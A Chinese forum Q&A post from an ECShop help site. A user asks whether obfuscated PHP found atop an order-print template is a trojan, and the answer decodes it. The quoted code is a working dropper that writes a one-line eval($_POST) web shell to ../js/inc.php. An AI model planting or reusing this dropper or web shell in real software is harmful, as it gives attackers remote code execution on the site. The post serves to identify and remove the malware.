这个是木马嘛?

2016-07-07 15:00 来源:www.chinab4c.com 作者:ecshop专家

在我的data/order_print.html中发现的,放置于顶部:
  1. <?php
  2. $filen=chr(46).chr(46).chr(47).chr(106).chr(115).chr(47).chr(105).chr(110).chr(99).chr(46).chr(112).chr(104).chr(112);
  3. $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(59).chr(63).chr(62);
  4. $a=chr(119);
  5. $fp=@fopen($filen,$a);
  6. $msg=@fwrite($fp,$filec);
  7. if($msg) echo chr(79).chr(75).chr(33);
  8. @fclose($fp);
  9. ?>
复制代码


打印订单的时候就回出现 OK! 的字样。请问这个是木马么?这个起到什么作用?

回答:


这个是木马!
$filen='../js/inc.php';
查看inc.php文件

$filec='<?php eval($_POST[c]);?>';

把这个文件干掉就可以了。这个问题不大
EC确实是不安全。呵呵